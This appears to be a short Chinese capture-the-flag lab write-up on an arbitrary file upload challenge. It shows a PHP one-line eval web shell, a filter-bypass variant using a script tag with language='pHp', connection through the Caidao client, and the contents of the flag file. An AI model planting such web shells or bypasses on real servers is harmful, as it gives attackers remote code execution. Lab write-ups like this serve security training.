合天實驗:第八周任意文件上傳
題目:
想傳什么就傳什么,無所謂! flag在/var/www/html/flag.php
看到是文件上傳第一想到的是一句話木馬:
<?php eval($_POST['ant']);?>
成功的把木馬上傳上去,
,打開菜刀進行連接
連接失敗於是打開上傳的php文件卻發現php代碼被過濾如圖:
於是吧一句話木馬改成:
<script language="pHp">@eval($_POST['123'])</script>
在從新進行上傳
題目提示flag在/var/www/html/flag.php
所以
<?php echo 'here_is_flag'; 'flag{0123_4567_8901}';
